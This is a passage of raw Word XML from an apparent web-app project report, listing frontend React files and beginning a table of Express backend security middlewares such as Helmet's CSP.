          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password change modal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D0B805" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="008907AE" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Token decoding and storage (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3063B8" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="008907AE" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Form validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E63C3" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="008907AE" w:rsidRDefault="004E318F" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008907AE">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Secure storing of JWT (no cookies → reduces CSRF impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5E21F" w14:textId="0F96B181" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="00F13D01">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Primary Files</w:t>
      </w:r>
      <w:r w:rsidR="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>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1"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr w:rsidR="004E318F" w:rsidRPr="004E318F" w14:paraId="648FF0F0" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08F06E2C" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ABF3639" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E318F" w:rsidRPr="004E318F" w14:paraId="715108AF" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="011B04ED" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/App.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0498B47E" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Navigation, auth state, password modal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E318F" w:rsidRPr="004E318F" w14:paraId="7EF9A12D" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CC70EC7" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/pages/Login.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B8EC3C9" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Login form (email/pass + Google)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E318F" w:rsidRPr="004E318F" w14:paraId="1711DC72" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49A92D2A" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/pages/Signup.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A367ACC" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Registration form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E318F" w:rsidRPr="004E318F" w14:paraId="34151FA8" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2342D077" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/pages/SellTicket.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="554430E8" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Sell ticket form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E318F" w:rsidRPr="004E318F" w14:paraId="68ED09A7" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296C2EAC" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/pages/TicketsList.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="364750A1" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Display all tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E318F" w:rsidRPr="004E318F" w14:paraId="686D3D6A" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68982B59" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>/App.css</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4491" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30C3F3D0" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E318F">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Global UI styling (including modal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34143ECB" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="004E318F" w:rsidRDefault="004E318F" w:rsidP="004E318F"/>
    <w:p w14:paraId="2D0B25FF" w14:textId="1D37E1D2" w:rsidR="00FC5B42" w:rsidRDefault="00FC5B42" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc214584799"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve">Server </w:t>
      </w:r>
      <w:r w:rsidR="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t xml:space="preserve">Backend </w:t>
      </w:r>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>(Express + Node.js)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0BE69B2C" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F" w:rsidP="004E318F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Core security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>middlewares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="1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1"/>
        <w:gridCol w:w="3118"/>
        <w:gridCol w:w="2649"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="71E39601" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28DBA2A1" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Security Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CFAC472" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B4F079C" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A651C" w:rsidRPr="00F13D01" w14:paraId="0F4AE3B5" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2856" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42FE9641" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CSP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BD7190D" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Helmet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2111" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E8CE9B" w14:textId="77777777" w:rsidR="004E318F" w:rsidRPr="00F13D01" w:rsidRDefault="004E318F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
